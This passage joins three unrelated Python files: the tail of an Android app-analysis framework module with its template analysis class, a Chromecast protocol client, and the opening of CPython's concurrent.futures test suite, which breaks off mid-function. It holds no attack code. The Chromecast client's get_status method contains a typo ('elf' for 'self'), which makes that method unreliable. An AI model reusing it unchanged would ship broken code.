%s %d" % (idx, filename, id_file)) logf = self.settings["log"](id_file, filename) is_analysis_dex, is_analysis_adex = True, True logf.debug("(worker-%d) filtering file %d" % (idx, id_file)) filter_file_ret, filter_file_type = myandro.filter_file( logf, fileraw) if filter_file_ret: logf.debug("(worker-%d) analysis %s" % (id_file, filter_file_type)) if filter_file_type == "APK": a = myandro.create_apk(logf, fileraw) is_analysis_dex = myandro.analysis_apk(logf, a) fileraw = a.get_dex() filter_file_type = androconf.is_android_raw(fileraw) elif filter_file_type == "AXML": axmlobj = myandro.create_axml(logf, fileraw) myandro.analysis_axml(logf, axmlobj) elif filter_file_type == "ARSC": arscobj = myandro.create_arsc(logf, fileraw) myandro.analysis_arsc(logf, arscobj) if is_analysis_dex and filter_file_type == "DEX": d = myandro.create_dex(logf, fileraw) is_analysis_adex = myandro.analysis_dex(logf, d) elif is_analysis_dex and filter_file_type == "DEY": d = myandro.create_dey(logf, fileraw) is_analysis_adex = myandro.analysis_dey(logf, d) if is_analysis_adex and d: dx = myandro.create_adex(logf, d) myandro.analysis_adex(logf, dx) myandro.analysis_app(logf, a, d, dx) myandro.finish(logf) except Exception as why: myandro.crash(logf, why) myandro.finish(logf) del a, d, dx, axmlobj, arscobj q.task_done() q = queue.Queue(self.settings["max_fetcher"]) for i in range(self.settings["max_fetcher"]): t = threading.Thread(target=worker, args=[i, q]) t.daemon = True t.start() terminated = True while terminated: terminated = myandro.fetcher(q) try: if terminated: time.sleep(10) except KeyboardInterrupt: terminated = False q.join() class DefaultAndroAnalysis(object): """ This class can be used as a template in order to analyse apps """ def fetcher(self, q): """ This method is called to fetch a new app in order to analyse it.
The queue must be fill with the following format: (filename, raw) :param q: the Queue to put new app """ pass def filter_file(self, log, fileraw): """ This method is called in order to filer a specific app :param log: an object which corresponds to a unique app :param fileraw: the raw app (a string) :rtype: a set with 2 elements, the return value (boolean) if it is necessary to continue the analysis and the file type """ file_type = androconf.is_android_raw(fileraw) if file_type == "APK" or file_type == "DEX" or file_type == "DEY" or file_type == "AXML" or file_type == "ARSC": return True, file_type return False, None def create_axml(self, log, fileraw): """ This method is called in order to create a new AXML object :param log: an object which corresponds to a unique app :param fileraw: the raw axml (a string) :rtype: an :class:`APK` object """ return apk.AXMLPrinter(fileraw) def create_arsc(self, log, fileraw): """ This method is called in order to create a new ARSC object :param log: an object which corresponds to a unique app :param fileraw: the raw arsc (a string) :rtype: an :class:`APK` object """ return apk.ARSCParser(fileraw) def create_apk(self, log, fileraw): """ This method is called in order to create a new APK object :param log: an object which corresponds to a unique app :param fileraw: the raw apk (a string) :rtype: an :class:`APK` object """ return apk.APK(fileraw, raw=True) def create_dex(self, log, dexraw): """ This method is called in order to create a DalvikVMFormat object :param log: an object which corresponds to a unique app :param dexraw: the raw classes.dex (a string) :rtype: a :class:`DalvikVMFormat` object """ return dvm.DalvikVMFormat(dexraw) def create_dey(self, log, dexraw): """ This method is called in order to create a DalvikOdexVMFormat object :param log: an object which corresponds to a unique app :param dexraw: the raw odex file (a string) :rtype: a :class:`DalvikOdexVMFormat` object """ return dvm.DalvikOdexVMFormat(dexraw) def create_adex(self, log, dexobj): """ This method is called in order to create a VMAnalysis object :param log: an object which corresponds to a unique app :param dexobj: a :class:`DalvikVMFormat` object :rytpe: a :class:`Analysis` object """ vm_analysis = analysis.Analysis(dexobj) vm_analysis.create_xref() return vm_analysis def analysis_axml(self, log, axmlobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param axmlobj: a :class:`AXMLPrinter` object :rtype: a boolean """ return True def analysis_arsc(self, log, arscobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param arscobj: a :class:`ARSCParser` object :rtype: a boolean """ return True def analysis_apk(self, log, apkobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param apkobj: a :class:`APK` object :rtype: a boolean """ return True def analysis_dex(self, log, dexobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param dexobj: a :class:`DalvikVMFormat` object :rtype: a boolean """ return True def analysis_dey(self, log, deyobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param deyobj: a :class:`DalvikOdexVMFormat` object :rtype: a boolean """ return True 
def analysis_adex(self, log, adexobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param adexobj: a :class:`VMAnalysis` object :rtype: a boolean """ return True def analysis_app(self, log, apkobj, dexobj, adexobj): """ This method is called if you wish to analyse the final app :param log: an object which corresponds to a unique app :param apkobj: a :class:`APK` object :param dexobj: a :class:`DalvikVMFormat` object :param adexobj: a :class:`VMAnalysis` object """ pass def finish(self, log): """ This method is called before the end of the analysis :param log: an object which corresponds to a unique app """ pass def crash(self, log, why): """ This method is called if a crash happens :param log: an object which corresponds to a unique app :param why: the exception that was raised """ pass def dump(self): """ This method is called to dump the result """ pass def dump_file(self, filename): """ This method is called to dump the result in a file :param filename: the filename to dump the result """ pass class DirectoryAndroAnalysis(DefaultAndroAnalysis): """ A simple class example to analyse a directory """ def __init__(self, directory): self.directory = directory def fetcher(self, q): for root, dirs, files in os.walk(self.directory, followlinks=True): if files: for f in files: real_filename = root if real_filename[-1] != "/": real_filename += "/" real_filename += f q.put((real_filename, read(real_filename))) return False
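# Illustrative usage sketch (not part of the module): drives an automatic analysis over a
# directory of apps. The directory path and the minimal per-file log class below are
# hypothetical; the "log" entry just has to be a callable invoked as log(id_file, filename)
# that returns an object with a debug() method, and "max_fetcher" controls both the queue
# size and the number of worker threads in AndroAuto.go().
class _ExampleLog(object):
    def __init__(self, id_file, filename):
        self.id_file = id_file
        self.filename = filename

    def debug(self, msg):
        log.debug("%s: %s" % (self.filename, msg))


def _example_run(directory="apks/"):
    settings = {
        # Object whose filter_file/create_*/analysis_* callbacks are invoked for each file.
        "my": DirectoryAndroAnalysis(directory),
        # Factory producing a per-file log object.
        "log": _ExampleLog,
        # Number of worker threads (and queue size).
        "max_fetcher": 3,
    }
    aa = AndroAuto(settings)
    aa.go()
    aa.dump()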
chromecast.py
import json import logging from random import randint from select import select from struct import pack, unpack, unpack_from import socket import ssl from threading import Thread, Event try: from queue import Queue, Empty except ImportError: from Queue import Queue, Empty CONNECTION_NS = "urn:x-cast:com.google.cast.tp.connection" HEARTBEAT_NS = 'urn:x-cast:com.google.cast.tp.heartbeat' RECEIVER_NS = 'urn:x-cast:com.google.cast.receiver' AUTH_NS = 'urn:x-cast:com.google.cast.tp.deviceauth' MEDIA_NS = 'urn:x-cast:com.google.cast.media' PLATFORM_DEST = 'receiver-0' class ProtoBuff(object): PROTOCOL_VERSION = 0 TYPE_ENUM = 0 TYPE_STRING = 2 TYPE_BYTES = TYPE_STRING TYPE_NAMES = { 0: 'String', 1: 'Binary' } def __init__(self, **kwargs): self.protocol = kwargs.get('protocol', self.PROTOCOL_VERSION) self.source_id = kwargs.get('source_id', 'source-0') self.destination_id = kwargs.get('destination_id', PLATFORM_DEST) self.namespace = kwargs.get('namespace', CONNECTION_NS) self.type = kwargs.get('type', 0) self.data = kwargs.get('data', '') if 'json' in kwargs: self.from_json(kwargs['json']) if 'msg' in kwargs: self.from_string(kwargs['msg'], kwargs.get('msg_len', len(kwargs['msg']))) @staticmethod def _pack_type(field_id, t): return (field_id << 3) | t @staticmethod def _unpack_type(val): return val >> 3, val & 0x7 @staticmethod def _data_length(s): x = b"" l = len(s) while (l > 0x7F): x += pack("B", l & 0x7F | 0x80) l >>= 7 x += pack("B", l & 0x7F) return x @staticmethod def _unpack_varint(bytes): """ Convert a varint to an integer. :param bytes: Bytes containing the varint. :return: integer """ value = 0 base = 1 rd = 0 for raw_byte in bytes: val_byte = ord(raw_byte) if type(raw_byte) != int else raw_byte rd += 1 value += (val_byte & 0x7f) * base if (val_byte & 0x80): # The MSB was set; increase the base and iterate again, continuing # to calculate the value. 
base *= 128 else: break return value, rd def _pack_string(self, n, the_str): sl = len(the_str) return pack(">BB%ds" % sl, self._pack_type(n, self.TYPE_STRING), sl, the_str.encode()) @staticmethod def _unpack_string(buff): slen = unpack_from(">B", buff, 0)[0] ss = unpack(">%ds" % slen, buff[1:1+slen])[0] return ss, slen + 1 def as_string(self): _msg = pack(">BB", self._pack_type(1, self.TYPE_ENUM), self.PROTOCOL_VERSION) _msg += self._pack_string(2, self.source_id) _msg += self._pack_string(3, self.destination_id) _msg += self._pack_string(4, self.namespace) _msg += pack(">BB", self._pack_type(5, self.TYPE_ENUM), self.type) _msg += pack(">B", self._pack_type(6, self.TYPE_BYTES)) _msg_len = self._data_length(self.data) _msg += pack(">%ds" % len(_msg_len), _msg_len) _msg += pack(">%ds" % len(self.data), self.data.encode()) return pack(">I%ds" % (len(_msg)), len(_msg), _msg) def from_string(self, bytes, blen): pos = 0 while pos < blen: a = unpack_from(">B", bytes, pos)[0] n, ct = self._unpack_type(a) pos += 1 if n == 1: self.protocol = unpack_from(">B", bytes, pos)[0] pos += 1 elif n == 2: self.source_id, rd = self._unpack_string(bytes[pos:]) pos += rd elif n == 3: self.destination_id, rd = self._unpack_string(bytes[pos:]) pos += rd elif n == 4: self.namespace, rd = self._unpack_string(bytes[pos:]) pos += rd elif n == 5: self.type = unpack_from(">B", bytes, pos)[0] pos += 1 elif n == 6: # utf-8 payload slen, rd = self._unpack_varint(bytes[pos:]) pos += rd self.data = unpack(">%ds" % slen, bytes[pos:pos + slen])[0] pos += slen elif n == 7: # binary payload slen, rd = self._unpack_varint(bytes[pos:]) pos += rd self.data = unpack_from(">%dB" % slen, bytes, pos)[0] pos += slen else: print("n = {}".format(n)) break def as_json(self): if self.type == 0: return json.loads(self.data.decode()) def from_json(self, json_data): self.data = json.dumps(json_data) def dump(self): """ Dump info to stdout... """ print(" Protocol Version: {}".format(self.protocol)) print(" Source ID: {}".format(self.source_id)) print(" Destination ID: {}".format(self.destination_id)) print(" Namespace: {}".format(self.namespace)) print(" Type: {} [{}]".format(self.TYPE_NAMES[self.type], self.type)) print(" Data: {}".format(self.data)) class ChromecastClient(object): """ Class to communicate with a Chromecast device. In order to communicate, a virtual connection is required, established by using the connect() function. Once established the Chromecast will send a PING request, which must be answered with a PONG reply or the connection will be closed. Useful links: - https://developers.google.com/cast/docs/reference/messages """ DEFAULT_MEDIA_APP = 'CC1AD845' def __init__(self, host, port=8009): self.logger = logging.getLogger() self.req_id = None self.volume = 0 self.muted = False self.standby = True self.active = False self.host = host self.port = port self.sessions = {} self.sessions_updated = Event() self.available_apps = set() self.apps_available = Event() self.connected = False self.socket = None self.input = Queue() self.output = Queue() self.running = False self.comm_thread = None self.switch_thread = None self.heartbeat = HeartbeatReceiver(self) self.responses = {} self.events = {} def start(self): if self.running is True: return self.socket = ssl.wrap_socket(socket.socket()) self.socket.settimeout(10) try: self.socket.connect((str(self.host), self.port)) except socket.gaierror as e: self.logger.warning("Unable to connect to device. 
%s", e) return self.running = True self.switch_thread = Thread(target=self.switchboard) self.switch_thread.daemon = True self.switch_thread.start() self.comm_thread = Thread(target=self.communicator) self.comm_thread.daemon = True self.comm_thread.start() self.connect() self.get_app_availability(self.DEFAULT_MEDIA_APP) def stop(self): self.running = False def register_event(self, request_id): ev = Event() self.events[request_id] = ev return ev def unregister_event(self, request_id): if request_id not in self.events: return del self.events[request_id] def communicator(self): _buffer = b'' while self.running: w = [self.socket] if self.output.not_empty else [] _r, _w, _e = select([self.socket], w, [self.socket], 10) if len(_e): break if len(_r) > 0: _buffer += self.socket.recv(2048) if len(_w) > 0: try: pb = self.output.get_nowait() # if pb.namespace != HEARTBEAT_NS: # print(">>>>>>>>>>>>>>") # pb.dump() wl = self.socket.write(pb.as_string()) self.output.task_done() except Empty: pass if len(_buffer) >= 4: plen = unpack(">I", _buffer[:4])[0] if len(_buffer) >= plen + 4: self.accept_message(_buffer[4:4 + plen], plen) _buffer = _buffer[4 + plen:] def switchboard(self): while self.running: pb = self.input.get() self.input.task_done() if pb.namespace == HEARTBEAT_NS: self.heartbeat.process_message(pb) continue # print("<<<<<<<<<<<<<<") # pb.dump() msg = pb.as_json() if pb.namespace == CONNECTION_NS: if msg.get('type') == 'CLOSE': if pb.source_id in self.sessions: self.sessions[pb.source_id].connected = False continue if pb.namespace == MEDIA_NS and pb.destination_id == '*': sess = self.sessions.get(pb.source_id) if sess is not None: sess.update_media_status(pb.as_json()) if msg.get('requestId') in self.events: self.responses[msg['requestId']] = pb self.events[msg['requestId']].set() def put_and_wait(self, pb, payload, timeout=10): req_id = self.request_id payload['requestId'] = req_id ev = self.register_event(req_id) pb.from_json(payload) self.output.put(pb) rv = ev.wait(timeout) self.unregister_event(req_id) if rv and req_id in self.responses: rv = self.responses[req_id] del self.responses[req_id] return rv def accept_message(self, bytes, blen): pb = ProtoBuff(msg=bytes, msg_len=blen) self.input.put(pb) @property def request_id(self): if self.req_id is None: self.req_id = randint(1000000, 80000000) self.req_id += 1 return self.req_id def stop_apps(self): for sess in self.sessions.values(): self.put_and_wait(ProtoBuff(namespace=RECEIVER_NS), {'type': 'STOP', 'sessionId': sess.session_id}) sess.disconnect() del self.sessions[sess.session_id] def connect(self): self.output.put(ProtoBuff(data="{\"type\":\"CONNECT\"}")) def get_status(self): self.put_and_wait(ProtoBuff(namespace=RECEIVER_NS), {'type': 'GET_STATUS'}) def get_app_availability(self, *apps): """ Enquire whether one or more apps are available on the Chromecast. We use the cached list wherever possible and block until we have an answer. :param apps: One or more app names or ids to search for. :return: Dict with each app requested as a True/False. 
""" if len(apps) == 0: return toask = [a for a in apps if a not in self.available_apps] if len(toask) > 0: payload = {'type': 'GET_APP_AVAILABILITY', 'appId': toask} resp = self.put_and_wait(ProtoBuff(namespace=RECEIVER_NS), payload) if resp is not False: data = resp.as_json() for app in data.get('availability', []): if data['availability'][app] == 'APP_AVAILABLE': self.available_apps.add(app) return {a: a in self.available_apps for a in apps} def launch_app(self, app_id=None, block=True): payload = {'type': 'LAUNCH', 'appId': app_id or self.DEFAULT_MEDIA_APP} resp = self.put_and_wait(ProtoBuff(namespace=RECEIVER_NS), payload) if resp is False: return None app_data = resp.as_json().get('status').get('applications')[0] if 'transportId' not in app_data: print("The app has been loaded but does not use the cast API.") return None sess = ChromecastSession(self, app_data) self.sessions[app_data['transportId']] = sess return sess def update_status(self, pb): msg = pb.as_json() self.volume = msg['status']['volume']['level'] self.muted = msg['status']['volume']['muted'] self.standby = msg['status']['isStandBy'] self.active = msg['status'].get('isActiveInput', False) if 'applications' in msg['status']: for app in msg['status']['applications']: if app['sessionId'] not in self.sessions: self.sessions[app['sessionId']] = ChromecastSession(self, app) else: self.sessions[app['sessionId']].update(app) self.sessions_updated.set() class ChromecastSession(object): """ Class to contain details of a session on a Chromecast. """ def __init__(self, client, data): self.client = client self.app_id = data['appId'] self.display_name = data['displayName'] self.namespaces = [ns['name'] for ns in data.get('namespaces', [])] self.session_id = data['sessionId'] self.status = data['statusText'] self.transport_id = data.get('transportId', None) self.connected = False self.media_loaded = False self.media_position = 0 self.media_status = '' self.media_session_id = 0 self.media_finished = False @property def uses_cast_api(self): return self.transport_id is not None def connect(self): if self.transport_id is None: return self.client.output.put(ProtoBuff(namespace=CONNECTION_NS, destination_id=self.transport_id, json={'type': 'CONNECT'})) ck = self.client.put_and_wait(ProtoBuff(namespace=MEDIA_NS, destination_id=self.transport_id), {'type': 'GET_STATUS'}) self.connected = ck is not False def disconnect(self): if not self.connected: return self.client.output.put(ProtoBuff(namespace=CONNECTION_NS, destination_id=self.transport_id, json={'type': 'CLOSE'})) def get_media_status(self): if not self.connected or not self.media_loaded: return update = self.client.put_and_wait(ProtoBuff(namespace=MEDIA_NS, destination_id=self.transport_id), {'type': 'GET_STATUS'}) if update is not False: self.update_media_status(update.as_json()) def update_media_status(self, data): """ This can be called from the parent (if the update was broadcast) or from get_media_status(). :param data: The update data. 
""" if data.get('type') != 'MEDIA_STATUS': return status = data.get('status', {}) if isinstance(status, list): if len(status) == 0: return status = status[0] self.media_session_id = status.get('mediaSessionId') self.media_status = status.get('playerState') self.media_position = status.get('currentTime') if 'idleReason' in status: self.media_finished = True def get_status(self): update = self.client.put_and_wait(ProtoBuff(namespace=self.namespaces[0], destination_id=elf.transport_id), {'type': 'GET_STATUS', 'mediaSessionId': self.session_id}) print(update.as_json()) def load_movie(self, url, ct, duration=None): if not self.connected: return payload = {'type': 'LOAD', 'media': {'contentId': url, 'contentType': ct, 'streamType': 'BUFFERING'}, 'autoplay': False } if duration is not None: payload['media']['duration'] = duration resp = self.client.put_and_wait(ProtoBuff(namespace=self.namespaces[0], destination_id=self.transport_id), payload, 15) if resp is False: print("Chromecast is unable to load media?") self.media_loaded = False return False self.media_loaded = True self.get_media_status() return True def play_media(self): if not self.media_loaded: return payload = {'type': 'PLAY', 'mediaSessionId': self.media_session_id} resp = self.client.put_and_wait(ProtoBuff(namespace=self.namespaces[0], destination_id=self.transport_id), payload) return resp is not False class ChromecastReceiver(object): def __init__(self, client, **kwargs): self.client = client self.namespace = kwargs.get('namespace') self.source = kwargs.get('source_id') self.dest = kwargs.get('destination_id') self.namespace = kwargs.get('namespace') def update_from_message(self, pb): if self.source is None: self.source = pb.source_id if self.dest is None: self.dest = pb.destination_id if self.namespace is None: self.namespace = pb.namespace def process_message(self, pb): self.update_from_message(pb) msg = pb.as_json() class HeartbeatReceiver(ChromecastReceiver): def __init__(self, client, **kwargs): ChromecastReceiver.__init__(self, client, **kwargs) def process_message(self, pb): self.update_from_message(pb) msg = pb.as_json() if 'type' in msg and msg['type'] == 'PING': self.client.output.put(ProtoBuff(source_id=self.source, destination_id=self.dest, namespace=self.namespace, json={'type': 'PONG'}))
test_concurrent_futures.py
import test.support # Skip tests if _multiprocessing wasn't built. test.support.import_module('_multiprocessing') # Skip tests if sem_open implementation is broken. test.support.import_module('multiprocessing.synchronize') from test.support.script_helper import assert_python_ok import contextlib import itertools import logging from logging.handlers import QueueHandler import os import queue import sys import threading import time import unittest import weakref from pickle import PicklingError from concurrent import futures from concurrent.futures._base import ( PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future, BrokenExecutor) from concurrent.futures.process import BrokenProcessPool from multiprocessing import get_context import multiprocessing.util def create_future(state=PENDING, exception=None, result=None): f = Future() f._state = state f._exception = exception f._result = result return f PENDING_FUTURE = create_future(state=PENDING) RUNNING_FUTURE = create_future(state=RUNNING) CANCELLED_FUTURE = create_future(state=CANCELLED) CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED) EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError()) SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42) INITIALIZER_STATUS = 'uninitialized' def mul(x, y): return x * y def capture(*args, **kwargs): return args, kwargs def sleep_and_raise(t): time.sleep(t) raise Exception('this is an exception') def sleep_and_print(t, msg): time.sleep(t) print(msg) sys.stdout.flush() def init(x): global INITIALIZER_STATUS INITIALIZER_STATUS = x def get_init_status(): return INITIALIZER_STATUS def init_fail(log_queue=None): if log_queue is not None: logger = logging.getLogger('concurrent.futures') logger.addHandler(QueueHandler(log_queue)) logger.setLevel('CRITICAL') logger.propagate = False time.sleep(0.1) # let some futures be scheduled raise ValueError('error in initializer') class MyObject(object): def my_method(self): pass class EventfulGCObj(): def __init__(self, mgr): self.event = mgr.Event() def __del__(self): self.event.set() def make_dummy_object(_): return MyObject() class BaseTestCase(unittest.TestCase): def setUp(self): self._thread_key = test.support.threading_setup() def tearDown(self): test.support.reap_children() test.support.threading_cleanup(*self._thread_key) class ExecutorMixin: worker_count = 5 executor_kwargs = {} def setUp(self): super().setUp() self.t1 = time.monotonic() if hasattr(self, "ctx"): self.executor = self.executor_type( max_workers=self.worker_count, mp_context=self.get_context(), **self.executor_kwargs) else: self.executor = self.executor_type( max_workers=self.worker_count, **self.executor_kwargs) self._prime_executor() def tearDown(self): self.executor.shutdown(wait=True) self.executor = None dt = time.monotonic() - self.t1 if test.support.verbose: print("%.2fs" % dt, end=' ') self.assertLess(dt, 300, "synchronization issue: test lasted too long") super().tearDown() def get_context(self): return get_context(self.ctx) def _prime_executor(self): # Make sure that the executor is ready to do work before running the # tests. This should reduce the probability of timeouts in the tests. 
futures = [self.executor.submit(time.sleep, 0.1) for _ in range(self.worker_count)] for f in futures: f.result() class ThreadPoolMixin(ExecutorMixin): executor_type = futures.ThreadPoolExecutor class ProcessPoolForkMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "fork" def get_context(self): if sys.platform == "win32": self.skipTest("require unix system") return super().get_context() class ProcessPoolSpawnMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "spawn" class ProcessPoolForkserverMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "forkserver" def get_context(self): if sys.platform == "win32": self.skipTest("require unix system") return super().get_context() def create_executor_tests(mixin, bases=(BaseTestCase,), executor_mixins=(ThreadPoolMixin, ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)): def strip_mixin(name): if name.endswith(('Mixin', 'Tests')): return name[:-5] elif name.endswith('Test'): return name[:-4] else: return name for exe in executor_mixins: name = ("%s%sTest" % (strip_mixin(exe.__name__), strip_mixin(mixin.__name__))) cls = type(name, (mixin,) + (exe,) + bases, {}) globals()[name] = cls class InitializerMixin(ExecutorMixin): worker_count = 2 def setUp(self): global INITIALIZER_STATUS INITIALIZER_STATUS = 'uninitialized' self.executor_kwargs = dict(initializer=init, initargs=('initialized',)) super().setUp() def test_initializer(self): futures = [self.executor.submit(get_init_status) for _ in range(self.worker_count)] for f in futures: self.assertEqual(f.result(), 'initialized') class FailingInitializerMixin(ExecutorMixin): worker_count = 2 def setUp(self): if hasattr(self, "ctx"): # Pass a queue to redirect the child's logging output self.mp_context = self.get_context() self.log_queue = self.mp_context.Queue() self.executor_kwargs = dict(initializer=init_fail, initargs=(self.log_queue,)) else: # In a thread pool, the child shares our logging setup # (see _assert_logged()) self.mp_context = None self.log_queue = None self.executor_kwargs = dict(initializer=init_fail) super().setUp() def test_initializer(self): with self._assert_logged('ValueError: error in initializer'): try: future = self.executor.submit(get_init_status) except BrokenExecutor: # Perhaps the executor is already broken pass else: with self.assertRaises(BrokenExecutor): future.result() # At some point, the executor should break t1 = time.monotonic() while not self.executor._broken: if time.monotonic() - t1 > 5: self.fail("executor not broken after 5 s.") time.sleep(0.01) # ... 
and from this point submit() is guaranteed to fail with self.assertRaises(BrokenExecutor): self.executor.submit(get_init_status) def _prime_executor(self): pass @contextlib.contextmanager def _assert_logged(self, msg): if self.log_queue is not None: yield output = [] try: while True: output.append(self.log_queue.get_nowait().getMessage()) except queue.Empty: pass else: with self.assertLogs('concurrent.futures', 'CRITICAL') as cm: yield output = cm.output self.assertTrue(any(msg in line for line in output), output) create_executor_tests(InitializerMixin) create_executor_tests(FailingInitializerMixin) class ExecutorShutdownTest: def test_run_after_shutdown(self): self.executor.shutdown() self.assertRaises(RuntimeError, self.executor.submit, pow, 2, 5) def test_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: from concurrent.futures import {executor_type} from time import sleep from test.test_concurrent_futures import sleep_and_print if __name__ == "__main__": context = '{context}' if context == "": t = {executor_type}(5) else: from multiprocessing import get_context context = get_context(context) t = {executor_type}(5, mp_context=context) t.submit(sleep_and_print, 1.0, "apple") """.format(executor_type=self.executor_type.__name__, context=getattr(self, "ctx", ""))) # Errors in atexit hooks don't change the process exit code, check # stderr manually. self.assertFalse(err) self.assertEqual(out.strip(), b"apple") def test_submit_after_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: import atexit @atexit.register def run_last(): try: t.submit(id, None) except RuntimeError: print("runtime-error") raise from concurrent.futures import {executor_type} if __name__ == "__main__": context = '{context}' if not context: t = {executor_type}(5) else: from multiprocessing import get_context context = get_context(context) t = {executor_type}(5, mp_context=context) t.submit(id, 42).result() """.format(executor_type=self.executor_type.__name__, context=getattr(self, "ctx", ""))) # Errors in atexit hooks don't change the process exit code, check # stderr manually. 
self.assertIn("RuntimeError: cannot schedule new futures", err.decode()) self.assertEqual(out.strip(), b"runtime-error") def test_hang_issue12364(self): fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)] self.executor.shutdown() for f in fs: f.result() class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase): def _prime_executor(self): pass def test_threads_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._threads), 3) self.executor.shutdown() for t in self.executor._threads: t.join() def test_context_manager_shutdown(self): with futures.ThreadPoolExecutor(max_workers=5) as e: executor = e self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for t in executor._threads: t.join() def test_del_shutdown(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor test.support.gc_collect() for t in threads: t.join() def test_thread_names_assigned(self): executor = futures.ThreadPoolExecutor( max_workers=5, thread_name_prefix='SpecialPool') executor.map(abs, range(-5, 5)) threads = executor._threads del executor test.support.gc_collect() for t in threads: self.assertRegex(t.name, r'^SpecialPool_[0-4]$') t.join() def test_thread_names_default(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor test.support.gc_collect() for t in threads: # Ensure that our default name is reasonably sane and unique when # no thread_name_prefix was supplied. self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$') t.join() class ProcessPoolShutdownTest(ExecutorShutdownTest): def _prime_executor(self): pass def test_processes_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._processes), 5) processes = self.executor._processes self.executor.shutdown() for p in processes.values(): p.join() def test_context_manager_shutdown(self): with futures.ProcessPoolExecutor(max_workers=5) as e: processes = e._processes self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for p in processes.values(): p.join() def test_del_shutdown(self): executor = futures.ProcessPoolExecutor(max_workers=5) list(executor.map(abs, range(-5, 5))) queue_management_thread = executor._queue_management_thread processes = executor._processes call_queue = executor._call_queue queue_management_thread = executor._queue_management_thread del executor test.support.gc_collect() # Make sure that all the executor resources were properly cleaned by # the shutdown process queue_management_thread.join() for p in processes.values(): p.join() call_queue.join_thread() create_executor_tests(ProcessPoolShutdownTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class WaitTests: def test_first_completed(self): future1 = self.executor.submit(mul, 21, 2) future2 = self.executor.submit(time.sleep, 1.5) done, not_done = futures.wait( [CANCELLED_FUTURE, future1, future2], return_when=futures.FIRST_COMPLETED) self.assertEqual(set([future1]), done) self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done) def test_first_completed_some_already_completed(self): future1 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, 
future1], return_when=futures.FIRST_COMPLETED) self.assertEqual( set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_first_exception(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(sleep_and_raise, 1.5) future3 = self.executor.submit(time.sleep, 3) finished, pending = futures.wait( [future1, future2, future3], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([future1, future2]), finished) self.assertEqual(set([future3]), pending) def test_first_exception_some_already_complete(self): future1 = self.executor.submit(divmod, 21, 0) future2 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1, future2], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1]), finished) self.assertEqual(set([CANCELLED_FUTURE, future2]), pending) def test_first_exception_one_already_failed(self): future1 = self.executor.submit(time.sleep, 2) finished, pending = futures.wait( [EXCEPTION_FUTURE, future1], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([EXCEPTION_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_all_completed(self): future1 = self.executor.submit(divmod, 2, 0) future2 = self.executor.submit(mul, 2, 21) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2], return_when=futures.ALL_COMPLETED) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2]), finished) self.assertEqual(set(), pending) def test_timeout(self): future1 = self.executor.submit(mul, 6, 7) future2 = self.executor.submit(time.sleep, 6) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2], timeout=5, return_when=futures.ALL_COMPLETED) self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1]), finished) self.assertEqual(set([future2]), pending) class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase): def test_pending_calls_race(self): # Issue #14406: multi-threaded race condition when waiting on all # futures. event = threading.Event() def future_func(): event.wait() newgil = hasattr(sys, 'getswitchinterval') if newgil: geti, seti = sys.getswitchinterval, sys.setswitchinterval else: geti, seti = sys.getcheckinterval, sys.setcheckinterval 